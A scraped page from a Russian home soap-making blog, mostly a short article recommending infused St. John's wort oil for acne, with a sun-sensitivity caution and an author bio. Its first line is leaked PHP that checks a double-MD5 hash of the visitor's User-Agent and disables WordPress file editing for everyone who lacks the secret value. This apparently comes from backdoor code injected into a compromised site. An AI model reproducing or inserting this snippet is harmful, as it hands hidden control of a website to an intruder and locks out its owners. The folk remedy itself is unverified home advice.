if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Избавляемся от угревой сыпи с помощью масла зверобоя | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Избавляемся от угревой сыпи с помощью масла зверобоя

Существует много народных средств, помогающих в борьбе с прыщами, но масло зверобоя является одним из самых эффективных. К тому же делается оно довольно легко!

Суще­ству­ет мно­го народ­ных средств, помо­га­ю­щих в борь­бе с пры­ща­ми, но мас­ло зве­робоя явля­ет­ся одним из самых эффек­тив­ных. К тому же дела­ет­ся оно доволь­но легко.

Для его при­го­тов­ле­ния потре­бу­ют­ся измель­чен­ные листья зве­робоя и рас­ти­тель­ное мас­ло. Четы­ре сто­ло­вых лож­ки тра­вы зве­робоя сле­ду­ет залить рас­ти­тель­ным мас­лом. Боль­ше все­го для этих целей под­хо­дит куку­руз­ное или олив­ко­вое мас­ло. Наста­и­ва­ют мас­ло 3 неде­ли в тем­ном месте.

Нано­сит­ся мас­ло 2 раза в день на те участ­ки кожи, кото­рые под­вер­же­ны угре­вой сыпи. Но выхо­дя на ули­цу, сто­ит исполь­зо­вать солн­це­за­щит­ный крем, так как кожа, сма­зан­ная зве­робой­ным мас­лом, ста­но­вит­ся чув­стви­тель­на к воз­дей­ствию сол­неч­ных лучей. Курс лече­ния состав­ля­ет 14 дней.Уход за кожей лица с помо­щью зве­робой­но­го мас­ла сде­ла­ет ее более глад­кой и изба­вит от прыщей.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!